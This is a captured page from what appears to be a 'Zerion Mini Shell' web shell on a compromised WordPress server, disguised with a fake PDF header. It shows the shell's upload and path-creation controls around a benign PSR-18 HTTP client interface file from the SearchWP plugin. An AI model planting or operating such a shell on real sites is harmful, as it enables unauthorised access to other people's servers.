%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/cwg/wp-content/plugins/searchwp/lib/vendor/psr/http-client/src/
Upload File :
Create Path :
Current File : //var/www/cwg/wp-content/plugins/searchwp/lib/vendor/psr/http-client/src/ClientInterface.php

<?php

namespace SearchWP\Dependencies\Psr\Http\Client;

use SearchWP\Dependencies\Psr\Http\Message\RequestInterface;
use SearchWP\Dependencies\Psr\Http\Message\ResponseInterface;
interface ClientInterface
{
    /**
     * Sends a PSR-7 request and returns a PSR-7 response.
     *
     * @param RequestInterface $request
     *
     * @return ResponseInterface
     *
     * @throws \Psr\Http\Client\ClientExceptionInterface If an error happens while processing the request.
     */
    public function sendRequest(\SearchWP\Dependencies\Psr\Http\Message\RequestInterface $request) : \SearchWP\Dependencies\Psr\Http\Message\ResponseInterface;
}

Zerion Mini Shell 1.0